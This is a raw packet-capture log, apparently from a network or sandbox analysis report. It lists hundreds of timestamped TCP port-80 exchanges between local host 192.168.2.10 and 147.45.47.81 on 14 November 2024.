                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563752890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563764095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563831091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563847065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563855886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563865900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563877106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563885927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563895941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563906908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563916922 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563926935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563937902 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563947916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563957930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563971043 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563980103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563992023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564002037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564012051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564021111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564037085 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564039946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564039946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564039946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564039946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564039946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564039946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564039946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564050913 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564058065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564068079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564078093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564078093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564078093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564080000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564078093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564078093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564078093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564078093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564095020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564105988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564116001 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564132929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564143896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564153910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564165115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564174891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564186096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564194918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564361095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564371109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564379930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564389944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564400911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564410925 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564420938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564435959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564441919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564441919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564441919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564441919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564441919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564441919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564449072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564460039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564466953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564466953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564466953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564471006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564483881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564495087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564505100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564516068 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564526081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564536095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564547062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564568996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564579964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564590931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564601898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564611912 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564623117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564632893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564642906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564701080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564712048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564721107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564732075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564743042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564754009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564764977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564774990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564821959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564832926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564843893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564856052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564867020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564877033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564887047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564901114 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564904928 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564905882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564905882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564905882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564905882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564905882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564905882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564905882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564925909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564925909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564925909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564925909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564927101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564927101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.564927101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565260887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565272093 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565282106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565290928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565301895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565311909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565321922 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565332890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565341949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565351963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565362930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565448999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565460920 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565469980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565483093 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565494061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565504074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565515041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565572023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565582037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565592051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565603018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565613985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565623999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565629959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565629959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565629959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565629959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565629959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565629959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565629959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565640926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565653086 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565665007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565668106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565668106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565668106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565675974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565682888 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565682888 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565687895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565699100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565710068 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565720081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565731049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565741062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565752029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565772057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565782070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565787077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565787077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565787077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565787077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565800905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565812111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565823078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565833092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565927029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565938950 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565948963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565960884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565969944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565982103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.565993071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566004038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566014051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566025972 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566035986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566071033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566071033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566071033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566071033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566071033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566071033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566071033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566095114 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566095114 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566095114 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566476107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566488028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566498995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566509008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566519022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566529036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566539049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566550016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566560984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566570997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566603899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566615105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566626072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566636086 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566647053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566657066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566667080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566734076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566745043 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566754103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566765070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566775084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566786051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566788912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566788912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566788912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566788912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566788912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566788912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566788912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566802025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566816092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566828966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566838026 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566844940 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566844940 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566844940 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566852093 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566864967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566874981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566885948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566895962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566906929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566917896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566927910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566937923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566947937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566963911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566976070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566984892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.566997051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567007065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567018032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567028046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567038059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567053080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567064047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567073107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567084074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567095041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567105055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567116022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567359924 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567359924 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567359924 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567359924 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567359924 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567359924 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567359924 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567397118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567397118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567397118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567397118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567564964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567574978 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567585945 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567612886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567622900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567634106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567645073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567692041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567692041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567692041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567712069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567724943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567735910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567841053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567851067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567861080 CET8049957147.45.47.81192.168.2.10
